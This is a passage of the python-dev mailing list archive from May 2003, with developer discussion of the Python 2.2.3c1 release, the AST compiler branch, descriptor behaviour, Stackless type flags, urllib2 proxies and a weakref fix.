> Thanks for all of your replies.  The front-end rewrite sounds especially
> interesting. I'm going to look into that.  Is the entire front end
> changing (ie scan/parse/ast) or just the AST structure ?
> 
> If you have any more information or directions please let me know.
> 

It is just a new AST.  Redoing/replacing pgen is something else 
entirely.  =)

The branch that this is being developed under in CVS is ast-branch. 
There is an incomplete README in Python/compile.txt that explains the
basic idea and direction.

-Brett



From barry@python.org  Fri May 23 04:30:45 2003
From: barry@python.org (Barry Warsaw)
Date: Thu, 22 May 2003 23:30:45 -0400
Subject: [Python-Dev] RELEASED Python 2.2.3c1
Message-ID: <F057EE6A-8CCE-11D7-A2F3-003065EEFAC8@python.org>

I'm happy to announce the release of Python 2.2.3c1 (release candidate 
1).  This is a bug fix release for the stable Python 2.2 code line.  
Barring any critical issues, we expect to release Python 2.2.3 final by 
this time next week.  We encourage those with an interest in a solid 
2.2.3 release to download this candidate and test it on their code.

The new release is available here:

	http://www.python.org/2.2.3/

Python 2.2.3 has a large number of bug fixes and memory leak patches.  
For full details, see the release notes at

	http://www.python.org/2.2.3/NEWS.txt

There are a small number of minor incompatibilities with Python 2.2.2; 
for details see:

	http://www.python.org/2.2.3/bugs.html

Perhaps the most important is that the Bastion.py and rexec.py modules 
have been disabled, since we do not deem them to be safe.

As usual, a Windows installer and a Unix/Linux source tarball are made 
available, as well as tarballs of the documentation in various forms. 
At the moment, no Mac version or Linux RPMs are available, although I 
expect them to appear soon after 2.2.3 final is released.

On behalf of Guido, I'd like to thank everyone who contributed to this 
release, and who continue to ensure Python's success.

Enjoy,
-Barry



From Jack.Jansen@cwi.nl  Fri May 23 12:42:20 2003
From: Jack.Jansen@cwi.nl (Jack Jansen)
Date: Fri, 23 May 2003 13:42:20 +0200
Subject: [Python-Dev] RELEASED Python 2.2.3c1
In-Reply-To: <F057EE6A-8CCE-11D7-A2F3-003065EEFAC8@python.org>
Message-ID: <9CF2178A-8D13-11D7-A3D6-0030655234CE@cwi.nl>

On Friday, May 23, 2003, at 05:30 Europe/Amsterdam, Barry Warsaw wrote:

> I'm happy to announce the release of Python 2.2.3c1 (release candidate 
> 1).

Oops, that suddenly went *very* fast, I thought I had until the
weekend...

Is there a chance I could get #723495 still in before 2.2.3 final? I 
was also hoping to find a fix for #571343, but I don't have a patch yet 
(although I'll try to get one up in the next few hours).
--
Jack Jansen, <Jack.Jansen@cwi.nl>, http://www.cwi.nl/~jack
If I can't dance I don't want to be part of your revolution -- Emma 
Goldman



From guido@python.org  Fri May 23 14:11:35 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 23 May 2003 09:11:35 -0400
Subject: [Python-Dev] Of what use is commands.getstatus()
In-Reply-To: "Your message of Thu, 22 May 2003 11:35:47 CDT."
 <16076.64611.579396.832520@montanaro.dyndns.org>
References: <16076.64611.579396.832520@montanaro.dyndns.org>
Message-ID: <200305231311.h4NDBZ725779@pcp02138704pcs.reston01.va.comcast.net>

> I was reading the docs for the commands module and noticed getstatus() seems
> to be completely unrelated to getstatusoutput() and getoutput().  I thought,
> "I'll correct the docs.  They must be wrong."  Then I looked at commands.py
> and saw the docs are correct.  It's the function definition which is weird.
> Of what use is it to return 'ls -ld file'?  Based on its name I would have
> guessed its function was
> 
>     def getstatus(cmd):
>         """Return status of executing cmd in a shell."""
>         return getstatusoutput(cmd)[0]
> 
> This particular function dates from 1990, so it clearly can't just be
> deleted, but it seems completely superfluous to me, especially given the
> existence of os.stat, os.listdir, etc.  Should it be deprecated or modified
> to do (what I think is) the obvious thing?

That whole module wasn't thought out very well.  I recently tried to
use it and found that the strip of the trailing \n on getoutput() is
also a counterproductive feature.  I suggest that someone should
design a replacement, perhaps to live in shutil, and then we can
deprecate it.  Until then I would leave it alone.  Certainly don't
"fix" it by doing something incompatible.

--Guido van Rossum (home page: http://www.python.org/~guido/)



From guido@python.org  Fri May 23 15:06:05 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 23 May 2003 10:06:05 -0400
Subject: [Python-Dev] Descriptor API
In-Reply-To: "Your message of Wed, 21 May 2003 01:41:16 BST."
 <000501c31f31$b0c820b0$f3100dd5@violante>
References: <000501c31f31$b0c820b0$f3100dd5@violante>
Message-ID: <200305231406.h4NE65T26180@pcp02138704pcs.reston01.va.comcast.net>

> I was doing some tricks with metaclasses and descriptors in Python 2.2 and
> stumbled on the following:
> 
> >>> class test(object):
> ...     a = property(lambda: 1)
> ...
> >>> print test.a
> <property object at 0x01504D20>
> >>> print test.a.__set__
> <method-wrapper object at 0x01517220>
> >>> print test.a.fset
> None
> 
> What this means in practice, is that if I want to test if a
> descriptor is read-only I have to have two tests: One for custom
> descriptors, checking that getting __set__ does not barf and another
> for property, checking that fset returns None.

Why are you interested in knowing whether a descriptor is read-only?

> So, why doesn't getting __set__  raise AttributeError in the above case?

This is a feature.  The presence of __set__ (even if it always raises
AttributeError when *called*) signals this as a "data descriptor".
The difference between data descriptors and others is that a data
descriptor can not be overridden by putting something in the instance
dict; a non-data descriptor can be overridden by assignment to an
instance attribute, which will store a value in the instance dict.

For example, a method is a non-data descriptor (and the prevailing
example of such).  This means that the following example works:

  class C(object):
      def meth(self): return 42

  x = C()
  x.meth()  # returns 42
  x.meth = lambda: 24
  x.meth()  # returns 24

> Is this a bug? If it's not, it sure is a (minor) feature request
> from my part :-)

Because of the above explanation, the request cannot be granted.

You can test the property's fset attribute however to tell whether a
'set' argument was passed to the constructor.
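
For instance (a throwaway class, Python 2.2 and later):

    class R(object):
        a = property(lambda self: 1)    # read-only: no fset passed

    print hasattr(R.a, '__set__')       # True anyway -- it's a data descriptor
    print R.a.fset is None              # True -- this is the read-only test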

--Guido van Rossum (home page: http://www.python.org/~guido/)


From op73418@mail.telepac.pt  Fri May 23 15:34:14 2003
From: op73418@mail.telepac.pt (Gonçalo Rodrigues)
Date: Fri, 23 May 2003 15:34:14 +0100
Subject: [Python-Dev] Descriptor API
References: <000501c31f31$b0c820b0$f3100dd5@violante> <200305231406.h4NE65T26180@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <001a01c32138$625c09b0$0d40c151@violante>

----- Original Message -----
From: "Guido van Rossum" <guido@python.org>
To: "Gonçalo Rodrigues" <op73418@mail.telepac.pt>
Cc: <python-dev@python.org>
Sent: Friday, May 23, 2003 3:06 PM
Subject: Re: [Python-Dev] Descriptor API


> > I was doing some tricks with metaclasses and descriptors in Python 2.2
and
> > stumbled on the following:
> >
> > >>> class test(object):
> > ...     a = property(lambda: 1)
> > ...
> > >>> print test.a
> > <property object at 0x01504D20>
> > >>> print test.a.__set__
> > <method-wrapper object at 0x01517220>
> > >>> print test.a.fset
> > None
> >
> > What this means in practice, is that if I want to test if a
> > descriptor is read-only I have to have two tests: One for custom
> > descriptors, checking that getting __set__ does not barf and another
> > for property, checking that fset returns None.
>
> Why are you interested in knowing whether a descriptor is read-only?
>

Introspection dealing with a metaclass that injected methods in its
instances depending on a descriptor. In other words, having fun with
Python's wacky tricks.

> > So, why doesn't getting __set__  raise AttributeError in the above case?
>
> This is a feature.  The presence of __set__ (even if it always raises
> AttributeError when *called*) signals this as a "data descriptor".
> The difference between data descriptors and others is that a data
> descriptor can not be overridden by putting something in the instance
> dict; a non-data descriptor can be overridden by assignment to an
> instance attribute, which will store a value in the instance dict.
>
> For example, a method is a non-data descriptor (and the prevailing
> example of such).  This means that the following example works:
>
>   class C(object):
>       def meth(self): return 42
>
>   x = C()
>   x.meth()  # returns 42
>   x.meth = lambda: 24
>   x.meth()  # returns 24
>
> > Is this a bug? If it's not, it sure is a (minor) feature request
> > from my part :-)
>
> Because of the above explanation, the request cannot be granted.
>

Thanks for the reply (and also to P. Eby, btw). I was way off track when I
sent the email, because it had not occurred to me that property was a type
implementing __get__ and __set__. With this piece of info connecting the
dots, the idea is just plain foolish.

> You can test the property's fset attribute however to tell whether a
> 'set' argument was passed to the constructor.
>
> --Guido van Rossum (home page: http://www.python.org/~guido/)

With my best regards,
G. Rodrigues



From guido@python.org  Fri May 23 15:39:10 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 23 May 2003 10:39:10 -0400
Subject: [Python-Dev] Need advice, maybe support
In-Reply-To: "Your message of Wed, 21 May 2003 02:50:40 +0200."
 <3ECACD60.10503@tismer.com>
References: <3EC579B4.9000303@tismer.com>
 <200305182104.h4IL4eY17830@pcp02138704pcs.reston01.va.comcast.net>
 <3EC91EA0.5090105@tismer.com>
 <200305192047.h4JKldW19641@pcp02138704pcs.reston01.va.comcast.net>
 <3EC94A92.2040604@tismer.com>
 <200305192136.h4JLaOX20032@pcp02138704pcs.reston01.va.comcast.net>
 <3ECA3DCB.50306@tismer.com>
 <200305201931.h4KJUuT21506@pcp02138704pcs.reston01.va.comcast.net>
 <3ECACD60.10503@tismer.com>
Message-ID: <200305231439.h4NEdAu26309@pcp02138704pcs.reston01.va.comcast.net>

> > The other is the new style where the PyMethodDef
> > array is in tp_methods, and is scanned once by PyType_Ready.
> 
> Right, again. Now, under the hopeful assumption that every
> sensible extension module that has some types to publish also
> does this through its module dictionary, I would have the
> opportunity to cause PyType_Ready being called early enough
> to modify the method table, before any of its methods is used
> at all.

Dangerous assumption!  It's not inconceivable that a class would
instantiate some of its own classes as part of its module
initialization.

> > 3rd party modules that have been around for a while are likely to use
> > Py_FindMethod.  With Py_FindMethod you don't have a convenient way to
> > store the pointer to the converted table, so it may be better to
> > simply check your bit in the first array element and then cast to a
> > PyMethodDef or a PyMethodDefEx array based on what the bit says (you
> > can safely assume that all elements of an array are the same size :-).
> 
> Hee hee, yeah. Of course, if there isn't a reliable way to
> intercept method table access before the first Py_FindMethod
> call, I could of course modify Py_FindMethod. For instance,
> a modified, new-style method table might be required to always
> start with a dummy entry, where the flags word is completely
> -1, to signal having been converted to new-style.

Why so drastic?  You could just set a reserved bit.

> ...
> 
> >>If that approach is trustworthy, I also could drop
> >>the request for these 8 bits.
> > 
> > Sure.  Ah, a bit in the type would work just as well, and
> > Py_FindMethod *does* have access to the type.
> 
> You think of the definition in methodobject.c, as it is
> 
> """
> /* Find a method in a single method list */
> 
> PyObject *
> Py_FindMethod(PyMethodDef *methods, PyObject *self, char *name)
> """
> 
> , assuming that self always is not NULL, but representing a valid
> object with a type, and this type is already referring to the
> methods table?

Right.  There is already code that uses self->ob_type in
Py_FindMethodInChain(), which is called by Py_FindMethod().

> Except for module objects, this seems to be right. I've run
> Python against a lot of Python modules, but none seems
> to call Py_FindMethod with a self parameter of NULL.

I don't think it would be safe to do so.

> If that is true, then I can patch a small couple of
> C functions to check for the new bit, and if it's not
> there, re-create the method table in place.
> This is music to me ears. But...
> 
> Well, there is a drawback:
> I *do* need two bits, and I hope you will allow me to add this
> second bit, as well.
> 
> The one, first bit, tells me if the source has been compiled
> with Stackless and its extension stuff. Nullo problemo.
> I can then in-place modify the method table in a compatible
> way, or leave it as it is, by default.
> But then, this isn't sufficient to set this bit then, like an
> "everything is fine, now" relief. This is so, since this is *still*
> an old module, and while its type's method tables have been
> patched, the type is still not augmented by new slots, like
> the new tp_call_nr slots (and maybe a bazillion to come, soon).
> The drawback is, that I cannot simply replace the whole type
> object, since type objects are not represented as object
> pointers (like they are now, most of the time, in the dynamic
> heaptype case), but they are constant struct addresses, where
> the old C module might be referring to.
> 
> So, what I think I need is no longer 9 bits, but two of them:
> One that says "everything great from the beginning", and another
> one that says "well, ok so far, but this is still an old object".
> 
> I do think this is the complete story, now.
> Instead of requiring nine bits, I'm asking for two.
> But this is just *your* option; I also can live with one bit,
> but then I have to add a special, invalid method table entry
> that just serves for this purpose.
> In order to keep my source code hack to the minimum, I'd really
> like to ask for the two bits in the typeobject flags.

OK, two bits you shall have.  Don't spend them all at once!

> Thanks so much for being so supportive -- chris

Anything to keep actual stackless support out of the core. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From barry@python.org  Fri May 23 15:55:51 2003
From: barry@python.org (Barry Warsaw)
Date: Fri, 23 May 2003 10:55:51 -0400
Subject: [Python-Dev] RELEASED Python 2.2.3c1
In-Reply-To: <9CF2178A-8D13-11D7-A3D6-0030655234CE@cwi.nl>
References: <9CF2178A-8D13-11D7-A3D6-0030655234CE@cwi.nl>
Message-ID: <3ECE3677.1030500@python.org>

Jack Jansen wrote:
> 
> Oops, that suddenly went *very* fast, I thought I had until the weekend...

But probably not as fast as it should have.  I had fun reading checkin 
comments like (paraphrasing), "this change is probably important enough 
for a 2.2.3 release" dated from December of last year. :)

> Is there a chance I could get #723495 still in before 2.2.3 final? I was 
> also hoping to find a fix for #571343, but I don't have a patch yet 
> (although I'll try to get one up in the next few hours).

I think it would be fine to get these into 2.2.3 final.

-Barry




From theller@python.net  Fri May 23 16:31:06 2003
From: theller@python.net (Thomas Heller)
Date: 23 May 2003 17:31:06 +0200
Subject: [Python-Dev] Need advice, maybe support
In-Reply-To: <200305231439.h4NEdAu26309@pcp02138704pcs.reston01.va.comcast.net>
References: <3EC579B4.9000303@tismer.com>
 <200305182104.h4IL4eY17830@pcp02138704pcs.reston01.va.comcast.net>
 <3EC91EA0.5090105@tismer.com>
 <200305192047.h4JKldW19641@pcp02138704pcs.reston01.va.comcast.net>
 <3EC94A92.2040604@tismer.com>
 <200305192136.h4JLaOX20032@pcp02138704pcs.reston01.va.comcast.net>
 <3ECA3DCB.50306@tismer.com>
 <200305201931.h4KJUuT21506@pcp02138704pcs.reston01.va.comcast.net>
 <3ECACD60.10503@tismer.com>
 <200305231439.h4NEdAu26309@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <k7chn0hx.fsf@python.net>

> > > The other is the new style where the PyMethodDef
> > > array is in tp_methods, and is scanned once by PyType_Ready.
> > 
> > Right, again. Now, under the hopeful assumption that every
> > sensible extension module that has some types to publish also
> > does this through its module dictionary, I would have the
> > opportunity to cause PyType_Ready being called early enough
> > to modify the method table, before any of its methods is used
> > at all.
> 
> Dangerous assumption!  It's not inconceivable that a class would
> instantiate some of its own classes as part of its module
> initialization.

I do not really know what you are talking about here, but that
assumption is violated by the ctypes module.
It has a number of metaclasses implemented in C, none of which
is exposed in the module dictionary, and there *have been* types which
were not exposed because they are only used internally.

Thomas



From jeremy@ZOPE.COM  Fri May 23 17:23:43 2003
From: jeremy@ZOPE.COM (Jeremy Hylton)
Date: 23 May 2003 12:23:43 -0400
Subject: [Python-Dev] Introduction
In-Reply-To: <Pine.LNX.4.55.0305221652550.30389@seawolf.cdf>
References: <LNBBLJKPBEHFEDALKOLCGEANEHAB.tim.one@comcast.net>
 <Pine.LNX.4.55.0305221652550.30389@seawolf.cdf>
Message-ID: <1053707023.28095.3.camel@slothrop.zope.com>

On Thu, 2003-05-22 at 16:56, Jeffery Roberts wrote:
> Thanks for all of your replies.  The front-end rewrite sounds especially
> interesting. I'm going to look into that.  Is the entire front end
> changing (ie scan/parse/ast) or just the AST structure ?
> 
> If you have any more information or directions please let me know.

The current plan is to create an AST and replace the bytecode compiler. 
We're leaving a rewrite of the parser for a later project.  It's a
fairly big project; large parts of it are done, but there is work
remaining to do in nearly every part -- the concrete-to-abstract
translator, error checking, compilation to byte-code.

At the moment, it's possible to start an interactive interpreter session
and see what works.  But it isn't possible to compile and run all of
site.py and everything it imports.

Jeremy




From logistix@cathoderaymission.net  Fri May 23 20:44:19 2003
From: logistix@cathoderaymission.net (logistix)
Date: Fri, 23 May 2003 14:44:19 -0500 (CDT)
Subject: [Python-Dev] Introduction
In-Reply-To: <1053707023.28095.3.camel@slothrop.zope.com>
Message-ID: <Pine.LNX.4.44.0305231443070.8377-100000@oblivion.cathoderaymission.net>

On 23 May 2003, Jeremy Hylton wrote:

> On Thu, 2003-05-22 at 16:56, Jeffery Roberts wrote:
> > Thanks for all of your replies.  The front-end rewrite sounds especially
> > interesting. I'm going to look into that.  Is the entire front end
> > changing (ie scan/parse/ast) or just the AST structure ?
> > 
> > If you have any more information or directions please let me know.
> 
> The current plan is to create an AST and replace the bytecode compiler. 
> We're leaving a rewrite of the parser for a later project.  It's a
> fairly big project; large parts of it are done, but there is work
> remaining to do in nearly every part -- the concrete-to-abstract
> translator, error checking, compilation to byte-code.
> 
> At the moment, it's possible to start an interactive interpreter session
> and see what works.  But it isn't possible to compile and run all of
> site.py and everything it imports.
> 
> Jeremy
> 

Should patches just go to sourceforge's "parser/compiler" category, or 
will that create too much confusion?




From jeremy@zope.com  Fri May 23 20:44:14 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 23 May 2003 15:44:14 -0400
Subject: [Python-Dev] Introduction
In-Reply-To: <Pine.LNX.4.44.0305231443070.8377-100000@oblivion.cathoderaymission.net>
References: <Pine.LNX.4.44.0305231443070.8377-100000@oblivion.cathoderaymission.net>
Message-ID: <1053719054.28074.13.camel@slothrop.zope.com>

On Fri, 2003-05-23 at 15:44, logistix wrote:
> Should patches just go to sourceforge's "parser/compiler" category, or 
> will that create too much confusion?

I think that would be fine.  We don't have a lot of parser/compiler
patches.

Jeremy




From tismer@tismer.com  Fri May 23 23:54:24 2003
From: tismer@tismer.com (Christian Tismer)
Date: Sat, 24 May 2003 00:54:24 +0200
Subject: [Python-Dev] Need advice, maybe support
In-Reply-To: <k7chn0hx.fsf@python.net>
References: <3EC579B4.9000303@tismer.com>	<200305182104.h4IL4eY17830@pcp02138704pcs.reston01.va.comcast.net>	<3EC91EA0.5090105@tismer.com>	<200305192047.h4JKldW19641@pcp02138704pcs.reston01.va.comcast.net>	<3EC94A92.2040604@tismer.com>	<200305192136.h4JLaOX20032@pcp02138704pcs.reston01.va.comcast.net>	<3ECA3DCB.50306@tismer.com>	<200305201931.h4KJUuT21506@pcp02138704pcs.reston01.va.comcast.net>	<3ECACD60.10503@tismer.com>	<200305231439.h4NEdAu26309@pcp02138704pcs.reston01.va.comcast.net> <k7chn0hx.fsf@python.net>
Message-ID: <3ECEA6A0.2020206@tismer.com>

Thomas Heller wrote:
>>>>The other is the new style where the PyMethodDef
>>>>array is in tp_methods, and is scanned once by PyType_Ready.
>>>
>>>Right, again. Now, under the hopeful assumption that every
>>>sensible extension module that has some types to publish also
>>>does this through its module dictionary, I would have the
>>>opportunity to cause PyType_Ready being called early enough
>>>to modify the method table, before any of its methods is used
>>>at all.
>>
>>Dangerous assumption!  It's not inconceivable that a class would
>>instantiate some of its own classes as part of its module
>>initialization.

This is the first time I've seen this.
I do agree that it is possible to break every compatibility
scheme. Especially in your module's case, I would not assume
that anybody would consider not using the most recent version
and compiling it against the most recent sources.
The topic I'm talking about is old code which should continue
to run.

> I do not really know what you are talking about here, but that
> assumption is violated by the ctypes module.
> It has a number of metaclasses implemented in C, neither of them
> is exposed in the module dictionary, and there *have been* types which
> were not exposed, because they are only used internally.

Hmm. Ok. Then I am really interested whether you have an idea
how to solve this efficiently.
My current solution is augmenting method tables with sibling
elements, which is a) not nice and b) involves extra flags
in ml_flags, which is not as efficient as possible.
Martin proposed to grow a second method table and to maintain
it in parallel. This is possible, but also seems to involve
quite some runtime overhead. What I'm seeking is a place
that gives a secure solution, without involving code that
is executed frequently.

On the other hand, this issue is about *most* foreign, old
code. I think I could stand it if one module or the other
simply had to be re-compiled with the current stackless
version, as long as this doesn't mean re-compiling everything.

ciao - chris

-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/




From tismer@tismer.com  Sat May 24 00:08:40 2003
From: tismer@tismer.com (Christian Tismer)
Date: Sat, 24 May 2003 01:08:40 +0200
Subject: [Python-Dev] Need advice, maybe support
In-Reply-To: <200305231439.h4NEdAu26309@pcp02138704pcs.reston01.va.comcast.net>
References: <3EC579B4.9000303@tismer.com> <200305182104.h4IL4eY17830@pcp02138704pcs.reston01.va.comcast.net> <3EC91EA0.5090105@tismer.com> <200305192047.h4JKldW19641@pcp02138704pcs.reston01.va.comcast.net> <3EC94A92.2040604@tismer.com> <200305192136.h4JLaOX20032@pcp02138704pcs.reston01.va.comcast.net> <3ECA3DCB.50306@tismer.com> <200305201931.h4KJUuT21506@pcp02138704pcs.reston01.va.comcast.net> <3ECACD60.10503@tismer.com> <200305231439.h4NEdAu26309@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3ECEA9F8.9000007@tismer.com>

Guido van Rossum wrote:

[me about time of type initialization]

> Dangerous assumption!  It's not inconceivable that a class would
> instantiate some of its own classes as part of its module
> initialization.

But we agree that an extension would somehow call into the
core to initialize its types/classes.

>>For instance,
>>a modified, new-style method table might be required to always
>>start with a dummy entry, where the flags word is completely
>>-1, to signal having been converted to new-style.
> 
> 
> Why so drastic?  You could just set a reserved bit.

Doesn't matter. What I want is that, at initialization time,
it is very clear what to initialize and how. At run-time,
I don't want anything to remain that slows matters down.
Therefore, creating an invalid slot for method tables
was kind of an idea to signal that some special
attention is needed during method initialization.

...

>>Except for module objects, this seems to be right. I've run
>>Python against a lot of Python modules, but none seems
>>to call Py_FindMethod with a self parameter of NULL.
> 
> 
> I don't think it would be safe to do so.

Further analysis has proven that you're right.

[more theoretical stuff, maybe not trustworthy without verification]

> OK, two bits you shall have.  Don't spend them all at once!

Took them, chewing on them.

>>Thanks so much for being so supportive -- chris
> 
> Anything to keep actual stackless support out of the core. :-)

Ahhh, that's the reason behind the generous intention? :-))
Ok with me, I got my two bits.

But there is something else that might be interesting for
very many Python users. Not yet announced, but you are
invited to my EuroPy talk.

cheers - chris

-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/






From niemeyer@conectiva.com  Sat May 24 16:26:12 2003
From: niemeyer@conectiva.com (Gustavo Niemeyer)
Date: Sat, 24 May 2003 12:26:12 -0300
Subject: [Python-Dev] RELEASED Python 2.2.3c1
In-Reply-To: <3ECE3677.1030500@python.org>
References: <9CF2178A-8D13-11D7-A3D6-0030655234CE@cwi.nl> <3ECE3677.1030500@python.org>
Message-ID: <20030524152612.GA22309@ibook.distro.conectiva>

Hi Barry!

> >Oops, that suddenly went *very* fast, I thought I had until the weekend...
> 
> But probably not as fast as it should have.  I had fun reading checkin 
> comments like (paraphrasing), "this change is probably important enough 
> for a 2.2.3 release" dated from December of last year. :)

Indeed. I'd have liked to work more on Python 2.2.3. Unfortunately,
Conectiva Linux was released just a few weeks ago, and my free time
suddenly vanished in that period.

> >Is there a chance I could get #723495 still in before 2.2.3 final? I was 
> >also hoping to find a fix for #571343, but I don't have a patch yet 
> >(although I'll try to get one up in the next few hours).
> 
> I think it would be fine to get these into 2.2.3 final.

I have some time this weekend to work on Python. Do you think it'd be ok
to backport some of the fixes we have introduced in the regular
expression engine in 2.3 to 2.2.3, or is it too late? We have a sf patch
open about that, but I'd like to port only the changes that don't
require major changes in the engine.

Also, have you seen the message about urllib2 I sent a few days ago?
Would that be something important to have in 2.2.3 (or even in 2.3)?

Do you plan to produce another release candidate?

Thanks!

-- 
Gustavo Niemeyer

[ 2AAC 7928 0FBF 0299 5EB5  60E2 2253 B29A 6664 3A0C ]


From martin@v.loewis.de  Sat May 24 17:01:08 2003
From: martin@v.loewis.de (Martin v. Löwis)
Date: 24 May 2003 18:01:08 +0200
Subject: [Python-Dev] RELEASED Python 2.2.3c1
In-Reply-To: <20030524152612.GA22309@ibook.distro.conectiva>
References: <9CF2178A-8D13-11D7-A3D6-0030655234CE@cwi.nl>
 <3ECE3677.1030500@python.org>
 <20030524152612.GA22309@ibook.distro.conectiva>
Message-ID: <m3he7kgwqj.fsf@mira.informatik.hu-berlin.de>

Gustavo Niemeyer <niemeyer@conectiva.com> writes:

> I have some time this weekend to work on Python. Do you think it'd be ok
> to backport some of the fixes we have introduced in the regular
> expression engine in 2.3 to 2.2.3, or is it too late? We have a sf patch
> open about that, but I'd like to port only the changes that don't
> require major changes in the engine.

I strongly advise deferring such changes to 2.2.4. This is really
tricky code, and changes should ideally be reviewed by three different
experts (including the author of the changes).

> Also, have you seen the message about urllib2 I sent a few days ago?
> Would that be something important to have in 2.2.3 (or even in 2.3)?

Nothing that is not in 2.3 right now can go into 2.2.3. Only backports
of accepted changes should be applied to the 2.2 branch.

> Do you plan to produce another release candidate?

My understanding is that there was only one release candidate
planned. Changes that require another release candidate should not be
applied right now, since another release candidate won't give them the
testing that they need.

Regards,
Martin


From niemeyer@conectiva.com  Sat May 24 17:08:33 2003
From: niemeyer@conectiva.com (Gustavo Niemeyer)
Date: Sat, 24 May 2003 13:08:33 -0300
Subject: [Python-Dev] RELEASED Python 2.2.3c1
In-Reply-To: <m3he7kgwqj.fsf@mira.informatik.hu-berlin.de>
References: <9CF2178A-8D13-11D7-A3D6-0030655234CE@cwi.nl> <3ECE3677.1030500@python.org> <20030524152612.GA22309@ibook.distro.conectiva> <m3he7kgwqj.fsf@mira.informatik.hu-berlin.de>
Message-ID: <20030524160832.GB22309@ibook.distro.conectiva>

> > I have some time this weekend to work on Python. Do you think it'd be ok
> > to backport some of the fixes we have introduced in the regular
> > expression engine in 2.3 to 2.2.3, or is it too late? We have a sf patch
> > open about that, but I'd like to port only the changes that don't
> > require major changes in the engine.
> 
> I strongly advise to defer such changes to 2.2.4. This is really
> tricky code, and changes should ideally be reviewed by three different
> experts (including the author of the changes).

Ack. I'll wait until 2.2.3 is out to touch that code. I'll look for
something else to do on Python this weekend. If you need any help
with 2.2.3, please contact me.

> > Also, have you seen the message about urllib2 I sent a few days ago?
> > Would that be something important to have in 2.2.3 (or even in 2.3)?
> 
> Nothing that is not in 2.3 right now can go into 2.2.3. Only backports
> of accepted changes should be applied to the 2.2 branch.

Ok. I'll leave 2.2.3 alone, and fix that behavior in urllib2 for 2.3.

> > Do you plan to produce another release candidate?
> 
> My understanding is that there was only one release candidate
> planned. Changes that require another release candidate should not be
> applied right now, since another release candidate won't give them the
> testing that they need.

Agreed.

-- 
Gustavo Niemeyer

[ 2AAC 7928 0FBF 0299 5EB5  60E2 2253 B29A 6664 3A0C ]


From niemeyer@conectiva.com  Sat May 24 20:03:25 2003
From: niemeyer@conectiva.com (Gustavo Niemeyer)
Date: Sat, 24 May 2003 16:03:25 -0300
Subject: [Python-Dev] urllib2 proxy support broken?
In-Reply-To: <20030519212807.GA29002@ibook.distro.conectiva>
References: <20030519212807.GA29002@ibook.distro.conectiva>
Message-ID: <20030524190325.GA30748@ibook.distro.conectiva>

> I've just tried to use the proxy support in urllib2, and was surprised
> by the fact that it seems to be broken, at least in 2.2 and 2.3. Can
> somebody please confirm that it's really broken, so that I can prepare
> a patch?

Ok.. I have prepared a simple fix for this, and sent it to SF patch
#742823. This fix should be backwards compatible, and at the same time
allows any kind of further customization of pre-defined and user-defined
classes.

Can someone please have a look at it before I check it in?

-- 
Gustavo Niemeyer

[ 2AAC 7928 0FBF 0299 5EB5  60E2 2253 B29A 6664 3A0C ]


From barry@python.org  Sat May 24 21:49:48 2003
From: barry@python.org (Barry Warsaw)
Date: Sat, 24 May 2003 16:49:48 -0400
Subject: [Python-Dev] RELEASED Python 2.2.3c1
In-Reply-To: <m3he7kgwqj.fsf@mira.informatik.hu-berlin.de>
Message-ID: <4215F6F7-8E29-11D7-A28B-003065EEFAC8@python.org>

On Saturday, May 24, 2003, at 12:01 PM, Martin v. Löwis wrote:

>> Do you plan to produce another release candidate?
>
> My understanding is that there was only one release candidate
> planned. Changes that require another release candidate should not be
> applied right now, since another release candidate won't give them the
> testing that they need.

Martin's right.  Unless Guido specifically overrides, please be ultra
conservative.

-Barry



From tim_one@email.msn.com  Sun May 25 06:21:22 2003
From: tim_one@email.msn.com (Tim Peters)
Date: Sun, 25 May 2003 01:21:22 -0400
Subject: [Python-Dev] RE: [Python-checkins] python/dist/src/Lib weakref.py,1.19,1.20
In-Reply-To: <000201c32277$59041c00$125ffea9@oemcomputer>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEODEKAB.tim_one@email.msn.com>

[redirected to python-dev]

[Tim]
>> Someone review this, please!  Final releases are getting close, Fred
>> (the weakref guy) won't be around until Tuesday, and the pre-patch
>> code can indeed raise spurious RuntimeErrors in the presence of
>> threads or mutating comparison functions.
>>
>> See the bug report for my confusions:  I can't see any reason for why
>> __delitem__ iterated over the keys.

[Raymond Hettinger]
> Until reading the note on threads, I didn't see the error and thought
> the original code was valid because it returned after the deletion
> instead of continuing to loop through iterkeys.

Note that one of the new tests I checked in provoked RuntimeError without
threads.
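
For reference, roughly what the two versions look like (the old body is
paraphrased from memory, not copied verbatim from weakref.py):

    # Old approach, roughly: scan every stored weakref for an equal referent.
    # If another thread, or a key's __eq__, mutates self.data during the scan,
    # the iterator raises RuntimeError; if nothing matches, it silently does
    # nothing (hence "never raised KeyError").
    def __delitem__(self, key):
        for r in self.data.iterkeys():
            if r() == key:
                del self.data[r]
                return

    # New one-liner (ref is weakref.ref): delete the entry for key directly.
    def __delitem__(self, key):
        del self.data[ref(key)]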

>> The new one-liner implementation is much faster, can't raise
>> RuntimeError, and should be> better-behaved in all respects wrt threads.

> Yes, that solves the OP's problem.

>> Bugfix candidate for 2.2.3 too, if someone else agrees with this
>> patch.

> The original code does its contortions to avoid raising a KeyError
> whenever the dictionary entry might have disappeared due to the
